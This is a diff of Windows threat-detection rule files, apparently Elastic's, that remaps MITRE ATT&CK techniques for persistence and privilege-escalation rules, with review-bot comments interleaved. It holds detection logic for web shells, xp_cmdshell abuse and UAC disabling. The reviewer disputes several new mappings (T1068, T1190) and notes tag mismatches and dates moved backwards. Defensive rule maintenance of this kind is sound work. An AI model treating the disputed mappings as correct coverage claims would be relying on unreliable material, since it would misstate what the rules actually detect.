@@ -147,56 +147,36 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1543" name = "Create or Modify System Process" reference = "https://attack.mitre.org/techniques/T1543/" - [[rule.threat.technique.subtechnique]] id = "T1543.003" name = "Windows Service" reference = "https://attack.mitre.org/techniques/T1543/003/" -[[rule.threat.technique]] -id = "T1574" -name = "Hijack Execution Flow" -reference = "https://attack.mitre.org/techniques/T1574/" -[[rule.threat.technique.subtechnique]] -id = "T1574.011" -name = "Services Registry Permissions Weakness" -reference = "https://attack.mitre.org/techniques/T1574/011/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1543" -name = "Create or Modify System Process" -reference = "https://attack.mitre.org/techniques/T1543/" - -[[rule.threat.technique.subtechnique]] -id = "T1543.003" -name = "Windows Service" -reference = "https://attack.mitre.org/techniques/T1543/003/" +id = "T1068" +name = "Exploitation for Privilege Escalation" +reference = "https://attack.mitre.org/techniques/T1068/" [[rule.threat.technique]] id = "T1574" name = "Hijack Execution Flow" reference = "https://attack.mitre.org/techniques/T1574/" -[[rule.threat.technique.subtechnique]] -id = "T1574.011" -name = "Services Registry Permissions Weakness" -reference = "https://attack.mitre.org/techniques/T1574/011/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + diff --git a/rules/windows/persistence_via_windows_management_instrumentation_event_subscription.toml b/rules/windows/persistence_via_windows_management_instrumentation_event_subscription.toml index 998595a716a..a064ad7db7c 100644 
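Review bot: The Privilege Escalation entry on the new side swaps T1543.003 for `id = "T1068"` (Exploitation for Privilege Escalation), yet this rule, going by its file name and the T1574 Hijack Execution Flow mapping it keeps, detects a service binary hijack rather than exploitation of a software vulnerability, so T1068 looks misapplied. The T1574.011 Services Registry Permissions Weakness sub-technique is removed from both tactic entries with no rationale; if that is because it is retired in the ATT&CK version the repository targets, say so in the commit message, otherwise keep it as the precise mapping. Persistence now carries only T1543.003 while Privilege Escalation keeps T1574; the asymmetry is presumably intended but worth confirming.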
--- a/rules/windows/persistence_via_windows_management_instrumentation_event_subscription.toml +++ b/rules/windows/persistence_via_windows_management_instrumentation_event_subscription.toml @@ -2,7 +2,7 @@ creation_date = "2020/12/04" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -63,7 +63,21 @@ references = ["https://www.elastic.co/security-labs/hunting-for-persistence-usin risk_score = 21 rule_id = "9b6813a1-daf1-457e-b0e6-0bb4e55b8a4c" severity = "low" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Crowdstrike", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Windows Security Event Logs", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: Sysmon", + "Data Source: SentinelOne", + "Data Source: Crowdstrike", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" 
@@ -77,18 +91,31 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1546" name = "Event Triggered Execution" reference = "https://attack.mitre.org/techniques/T1546/" - [[rule.threat.technique.subtechnique]] id = "T1546.003" name = "Windows Management Instrumentation Event Subscription" reference = "https://attack.mitre.org/techniques/T1546/003/" + + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1047" +name = "Windows Management Instrumentation" +reference = "https://attack.mitre.org/techniques/T1047/" + + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + diff --git a/rules/windows/persistence_via_wmi_stdregprov_run_services.toml b/rules/windows/persistence_via_wmi_stdregprov_run_services.toml index d1fe98c2dbe..df5ba00f618 100644 --- a/rules/windows/persistence_via_wmi_stdregprov_run_services.toml +++ b/rules/windows/persistence_via_wmi_stdregprov_run_services.toml @@ -2,7 +2,7 @@ creation_date = "2021/03/15" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/02/03" [transform] [[transform.osquery]] @@ -100,7 +100,15 @@ references = [ risk_score = 73 rule_id = "70d12c9c-0dbd-4a1a-bc44-1467502c9cf6" severity = "high" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Persistence", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" 
@@ -162,46 +170,41 @@ registry where host.os.type == "windows" and event.type == "change" and [[rule.threat]] framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1047" -name = "Windows Management Instrumentation" -reference = "https://attack.mitre.org/techniques/T1047/" - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1112" -name = "Modify Registry" -reference = "https://attack.mitre.org/techniques/T1112/" - [[rule.threat.technique]] id = "T1543" name = "Create or Modify System Process" reference = "https://attack.mitre.org/techniques/T1543/" - [[rule.threat.technique.subtechnique]] id = "T1543.003" name = "Windows Service" reference = "https://attack.mitre.org/techniques/T1543/003/" + [[rule.threat.technique]] id = "T1547" name = "Boot or Logon Autostart Execution" reference = "https://attack.mitre.org/techniques/T1547/" - [[rule.threat.technique.subtechnique]] id = "T1547.001" name = "Registry Run Keys / Startup Folder" reference = "https://attack.mitre.org/techniques/T1547/001/" + + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1047" +name = "Windows Management Instrumentation" +reference = "https://attack.mitre.org/techniques/T1047/" + + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + diff --git a/rules/windows/persistence_via_xp_cmdshell_mssql_stored_procedure.toml b/rules/windows/persistence_via_xp_cmdshell_mssql_stored_procedure.toml index fd99f614a1a..848ae070ecd 100644 --- a/rules/windows/persistence_via_xp_cmdshell_mssql_stored_procedure.toml +++ b/rules/windows/persistence_via_xp_cmdshell_mssql_stored_procedure.toml 
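Review bot: The new side keeps an Execution tactic entry (`+[rule.threat.tactic]` with `id = "TA0002"` / `name = "Execution"` carrying T1047), but the preceding tags hunk for this file drops `Tactic: Execution` and leaves only `Tactic: Persistence`, so `tags` and `rule.threat` now disagree and any check that each mapped tactic has a matching `Tactic:` tag will fail on this rule. Either add `"Tactic: Execution",` back to `tags` or remove the T1047 `[[rule.threat]]` block. Separately, T1112 Modify Registry is removed here even though the other registry-change rules in this diff gain a Defense Evasion/T1112 entry; that inconsistency looks unintended.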
@@ -2,7 +2,7 @@ creation_date = "2020/08/14" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/09/11" [rule] author = ["Elastic"] @@ -62,7 +62,20 @@ references = ["https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/ risk_score = 47 rule_id = "4ed493fc-d637-4a36-80ff-ac84937e5461" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Persistence", "Resources: Investigation Guide", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Crowdstrike"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Windows Security Event Logs", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: Sysmon", + "Data Source: SentinelOne", + "Data Source: Crowdstrike", +] timestamp_override = "event.ingested" type = "new_terms" 
@@ -95,39 +108,39 @@ process.parent.name:"sqlservr.exe" and process.command_line : * and [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1505" +name = "Server Software Component" +reference = "https://attack.mitre.org/techniques/T1505/" +[[rule.threat.technique.subtechnique]] +id = "T1505.001" +name = "SQL Stored Procedures" +reference = "https://attack.mitre.org/techniques/T1505/001/" + + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" - [[rule.threat.technique.subtechnique]] id = "T1059.003" name = "Windows Command Shell" reference = "https://attack.mitre.org/techniques/T1059/003/" + + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1505" -name = "Server Software Component" -reference = "https://attack.mitre.org/techniques/T1505/" - -[[rule.threat.technique.subtechnique]] -id = "T1505.001" -name = "SQL Stored Procedures" -reference = "https://attack.mitre.org/techniques/T1505/001/" - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" [rule.new_terms] field = "new_terms_fields" value = ["host.id", "process.command_line"] diff --git a/rules/windows/persistence_webshell_detection.toml b/rules/windows/persistence_webshell_detection.toml index d2463cba3c3..9999667d1d4 100644 --- a/rules/windows/persistence_webshell_detection.toml +++ b/rules/windows/persistence_webshell_detection.toml 
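Review bot: The Execution entry survives on the new side (`[[rule.threat.technique]]` with `id = "T1059"` and T1059.003 under `id = "TA0002"`), but the tags hunk just above removes `Tactic: Execution` and keeps only `Tactic: Persistence`, so the tag list no longer reflects the threat mapping. Add `"Tactic: Execution",` after `"Tactic: Persistence",` in `tags`, or drop the Execution `[[rule.threat]]` block if the rule is meant to be Persistence-only; elsewhere in this diff tags and mapped tactics are kept paired.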
@@ -2,7 +2,7 @@ creation_date = "2021/08/24" integration = ["endpoint", "windows", "system", "sentinel_one_cloud_funnel", "m365_defender", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/02" [rule] author = ["Elastic"] @@ -78,7 +78,22 @@ references = [ risk_score = 73 rule_id = "2917d495-59bd-4250-b395-c29409b76086" severity = "high" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Persistence", "Resources: Investigation Guide", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: SentinelOne", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: Crowdstrike"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Initial Access", + "Tactic: Execution", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: SentinelOne", + "Data Source: Windows Security Event Logs", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: Sysmon", + "Data Source: Crowdstrike", +] timestamp_override = "event.ingested" type = "new_terms" 
@@ -138,7 +153,35 @@ value = "*?:\\\\Program Files (x86)\\\\*" [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1505" +name = "Server Software Component" +reference = "https://attack.mitre.org/techniques/T1505/" +[[rule.threat.technique.subtechnique]] +id = "T1505.003" +name = "Web Shell" +reference = "https://attack.mitre.org/techniques/T1505/003/" + + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1190" +name = "Exploit Public-Facing Application" +reference = "https://attack.mitre.org/techniques/T1190/" + + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1047" name = "Windows Management Instrumentation" @@ -148,7 +191,6 @@ reference = "https://attack.mitre.org/techniques/T1047/" id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" - [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" @@ -164,28 +206,14 @@ id = "T1059.005" name = "Visual Basic" reference = "https://attack.mitre.org/techniques/T1059/005/" + + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1505" -name = "Server Software Component" -reference = "https://attack.mitre.org/techniques/T1505/" - -[[rule.threat.technique.subtechnique]] -id = "T1505.003" -name = "Web Shell" -reference = "https://attack.mitre.org/techniques/T1505/003/" - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" [rule.new_terms] field = "new_terms_fields" value = ["host.id", "process.command_line"] 
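Review bot: The new `[[rule.threat]]` block mapping `id = "T1190"` Exploit Public-Facing Application under Initial Access asserts coverage this rule does not observe: it is a `new_terms` rule over `host.id` and `process.command_line`, which sees the process a web shell spawns, not the exploitation that planted the shell. The `Tactic: Initial Access` tag added in the tags hunk is consistent with the mapping, but ATT&CK coverage views will count this rule as detecting T1190. If the mapping is kept to reflect typical precursor activity, a sentence in the rule description stating that Initial Access is inferred rather than detected would keep the claim honest.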
diff --git a/rules/windows/persistence_werfault_reflectdebugger.toml b/rules/windows/persistence_werfault_reflectdebugger.toml index 518c4aa2c20..10b36a1c675 100644 --- a/rules/windows/persistence_werfault_reflectdebugger.toml +++ b/rules/windows/persistence_werfault_reflectdebugger.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/29" integration = ["endpoint", "m365_defender", "sentinel_one_cloud_funnel", "windows", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/08/26" [rule] author = ["Elastic"] @@ -89,18 +89,26 @@ registry where host.os.type == "windows" and event.type == "change" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1546" name = "Event Triggered Execution" reference = "https://attack.mitre.org/techniques/T1546/" -[[rule.threat.technique.subtechnique]] -id = "T1546.012" -name = "Image File Execution Options Injection" -reference = "https://attack.mitre.org/techniques/T1546/012/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1112" +name = "Modify Registry" +reference = "https://attack.mitre.org/techniques/T1112/" + + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/windows/privilege_escalation_account_takeover_mixed_logon_types.toml b/rules/windows/privilege_escalation_account_takeover_mixed_logon_types.toml index c8ff89d715e..98d75bb0f11 100644 --- a/rules/windows/privilege_escalation_account_takeover_mixed_logon_types.toml +++ b/rules/windows/privilege_escalation_account_takeover_mixed_logon_types.toml @@ -2,7 +2,7 @@ creation_date = "2026/02/25" integration = ["system", "windows"] maturity = "production" -updated_date = "2026/03/24" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
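Review bot: Removing `[[rule.threat.technique.subtechnique]]` `id = "T1546.012"` leaves the Persistence entry on the bare parent T1546 Event Triggered Execution, the least specific mapping available; if ReflectDebugger is judged not to be Image File Execution Options Injection, a one-line rationale in the commit would help the next reviewer, otherwise keep the sub-technique. The new Defense Evasion/T1112 entry needs a matching `Tactic: Defense Evasion` tag, and this file's `tags` line is not part of the visible hunks, so confirm it was updated alongside.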
@@ -44,7 +44,14 @@ references = ["https://attack.mitre.org/techniques/T1078/"] risk_score = 47 rule_id = "b2c3d4e5-f6a7-5b6c-9d0e-1f2a3b4c5d6e" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Initial Access", "Data Source: Windows Security Event Logs", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Data Source: Windows Security Event Logs", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "esql" @@ -70,13 +77,13 @@ from logs-system.security*, logs-windows.forwarded*, winlogbeat-* metadata _id, [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" + [rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/windows/privilege_escalation_badsuccessor_dmsa_abuse.toml b/rules/windows/privilege_escalation_badsuccessor_dmsa_abuse.toml index 8ef66f52c9e..7a12ba94bc3 100644 --- a/rules/windows/privilege_escalation_badsuccessor_dmsa_abuse.toml +++ b/rules/windows/privilege_escalation_badsuccessor_dmsa_abuse.toml @@ -2,7 +2,7 @@ creation_date = "2025/05/23" integration = ["system", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/19" [rule] author = ["Elastic"] 
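Review bot: The tactic for this rule flips from Initial Access (TA0001) to Privilege Escalation (TA0004) in both `tags` and `[rule.threat.tactic]`, which is a content change, yet the `updated_date` hunk for the same file moves the date backwards from 2026/03/24 to 2026/03/23. T1078 Valid Accounts sits under both tactics in ATT&CK, so a tactic/technique correlation check passes either way; the right choice depends on what the ES|QL query asserts (mixed logon types only imply privilege gain if they reach a higher-privileged context), and that query is outside this hunk.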
@@ -42,7 +42,16 @@ references = ["https://www.akamai.com/blog/security-research/abusing-dmsa-for-pr risk_score = 73 rule_id = "2c74e26b-dfe3-4644-b62b-d0482f124210" severity = "high" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Use Case: Active Directory Monitoring", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Active Directory", "Data Source: Windows Security Event Logs", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Use Case: Active Directory Monitoring", + "Data Source: Active Directory", + "Data Source: Windows Security Event Logs", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "new_terms" @@ -53,29 +62,27 @@ event.code:5136 and host.os.type:"windows" and winlog.event_data.AttributeLDAPDi [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" +[[rule.threat.technique.subtechnique]] +id = "T1078.002" +name = "Domain Accounts" +reference = "https://attack.mitre.org/techniques/T1078/002/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" + [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + [rule.new_terms] field = "new_terms_fields" value = ["winlog.event_data.SubjectUserName"] 
diff --git a/rules/windows/privilege_escalation_create_process_as_different_user.toml b/rules/windows/privilege_escalation_create_process_as_different_user.toml index 412967333f8..683648ba45d 100644 --- a/rules/windows/privilege_escalation_create_process_as_different_user.toml +++ b/rules/windows/privilege_escalation_create_process_as_different_user.toml @@ -2,7 +2,7 @@ creation_date = "2022/08/30" integration = ["system", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/11/14" [rule] author = ["Elastic"] @@ -57,7 +57,14 @@ setup = """## Setup Audit events 4624 and 4688 are needed to trigger this rule. """ severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Privilege Escalation", "Data Source: Windows Security Event Logs", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Data Source: Windows Security Event Logs", + "Resources: Investigation Guide", +] type = "eql" query = ''' 
@@ -76,36 +83,24 @@ sequence by winlog.computer_name with maxspan=1m [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1134" name = "Access Token Manipulation" reference = "https://attack.mitre.org/techniques/T1134/" - [[rule.threat.technique.subtechnique]] id = "T1134.002" name = "Create Process with Token" reference = "https://attack.mitre.org/techniques/T1134/002/" -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - -[[rule.threat]] -framework = "MITRE ATT&CK" +[[rule.threat.technique.subtechnique]] +id = "T1134.003" +name = "Make and Impersonate Token" +reference = "https://attack.mitre.org/techniques/T1134/003/" -[[rule.threat.technique]] -id = "T1134" -name = "Access Token Manipulation" -reference = "https://attack.mitre.org/techniques/T1134/" -[[rule.threat.technique.subtechnique]] -id = "T1134.002" -name = "Create Process with Token" -reference = "https://attack.mitre.org/techniques/T1134/002/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + diff --git a/rules/windows/privilege_escalation_create_process_with_token_unpriv.toml b/rules/windows/privilege_escalation_create_process_with_token_unpriv.toml index 5d76a63ef19..ab8e8584da6 100644 --- a/rules/windows/privilege_escalation_create_process_with_token_unpriv.toml +++ b/rules/windows/privilege_escalation_create_process_with_token_unpriv.toml @@ -2,7 +2,7 @@ creation_date = "2023/10/02" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/01/15" [rule] author = ["Elastic"] 
@@ -19,7 +19,14 @@ references = ["https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf-win risk_score = 47 rule_id = "1b0b4818-5655-409b-9c73-341cac4bb73f" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Privilege Escalation", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -91,36 +98,24 @@ In Windows environments, tokens are used to represent user credentials and permi [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1134" name = "Access Token Manipulation" reference = "https://attack.mitre.org/techniques/T1134/" +[[rule.threat.technique.subtechnique]] +id = "T1134.001" +name = "Token Impersonation/Theft" +reference = "https://attack.mitre.org/techniques/T1134/001/" [[rule.threat.technique.subtechnique]] id = "T1134.002" name = "Create Process with Token" reference = "https://attack.mitre.org/techniques/T1134/002/" -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1134" -name = "Access Token Manipulation" -reference = "https://attack.mitre.org/techniques/T1134/" -[[rule.threat.technique.subtechnique]] -id = "T1134.002" -name = "Create Process with Token" -reference = "https://attack.mitre.org/techniques/T1134/002/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + diff --git a/rules/windows/privilege_escalation_credroaming_ldap.toml b/rules/windows/privilege_escalation_credroaming_ldap.toml index cdb98a74b03..50b903484bb 100644 
--- a/rules/windows/privilege_escalation_credroaming_ldap.toml +++ b/rules/windows/privilege_escalation_credroaming_ldap.toml @@ -2,7 +2,7 @@ creation_date = "2022/11/09" integration = ["system", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/11/14" [rule] author = ["Elastic"] @@ -76,7 +76,16 @@ Audit Directory Service Changes (Success,Failure) ``` """ severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Active Directory", "Use Case: Active Directory Monitoring", "Data Source: Windows Security Event Logs", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Data Source: Active Directory", + "Tactic: Privilege Escalation", + "Use Case: Active Directory Monitoring", + "Data Source: Windows Security Event Logs", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "query" @@ -89,26 +98,14 @@ event.code:"5136" and host.os.type:"windows" and winlog.event_data.AttributeLDAP [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" +id = "T1068" +name = "Exploitation for Privilege Escalation" +reference = "https://attack.mitre.org/techniques/T1068/" -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + 
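Review bot: Replacing T1098 Account Manipulation with `id = "T1068"` Exploitation for Privilege Escalation changes what this rule claims: the query keys on `event.code:"5136"` and an LDAP attribute change (per the hunk header), which observes a directory attribute modification, not exploitation of a software vulnerability, so T1098 under Privilege Escalation was the more literal mapping, and dropping the Persistence entry loses the stored-credential angle. The new `tags` order also places `"Data Source: Active Directory",` ahead of `"Tactic: Privilege Escalation",`, unlike the other rules in this diff where the `Tactic:` tag follows `"Use Case: Threat Detection",`; move it for consistency.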
diff --git a/rules/windows/privilege_escalation_disable_uac_registry.toml b/rules/windows/privilege_escalation_disable_uac_registry.toml index b2289c53690..8d113e3b967 100644 --- a/rules/windows/privilege_escalation_disable_uac_registry.toml +++ b/rules/windows/privilege_escalation_disable_uac_registry.toml @@ -2,7 +2,7 @@ creation_date = "2021/01/20" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/08/26" [rule] author = ["Elastic"] @@ -81,7 +81,19 @@ references = [ risk_score = 47 rule_id = "d31f183a-e5b1-451b-8534-ba62bca0b404" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Privilege Escalation", "Resources: Investigation Guide", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Microsoft Defender for Endpoint", "Data Source: SentinelOne", "Data Source: Crowdstrike"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: SentinelOne", + "Data Source: Crowdstrike", +] timestamp_override = "event.ingested" type = "eql" 
@@ -101,41 +113,51 @@ registry where host.os.type == "windows" and event.type == "change" and [[rule.threat]] framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1112" -name = "Modify Registry" -reference = "https://attack.mitre.org/techniques/T1112/" - [[rule.threat.technique]] id = "T1548" name = "Abuse Elevation Control Mechanism" reference = "https://attack.mitre.org/techniques/T1548/" - [[rule.threat.technique.subtechnique]] id = "T1548.002" name = "Bypass User Account Control" reference = "https://attack.mitre.org/techniques/T1548/002/" -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1112" +name = "Modify Registry" +reference = "https://attack.mitre.org/techniques/T1112/" [[rule.threat.technique]] id = "T1548" name = "Abuse Elevation Control Mechanism" reference = "https://attack.mitre.org/techniques/T1548/" - [[rule.threat.technique.subtechnique]] id = "T1548.002" name = "Bypass User Account Control" reference = "https://attack.mitre.org/techniques/T1548/002/" + +[[rule.threat.technique]] +id = "T1562" +name = "Impair Defenses" +reference = "https://attack.mitre.org/techniques/T1562/" +[[rule.threat.technique.subtechnique]] +id = "T1562.001" +name = "Disable or Modify Tools" +reference = "https://attack.mitre.org/techniques/T1562/001/" + + + [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" +id = "TA0005" +name = "Defense Evasion" +reference = 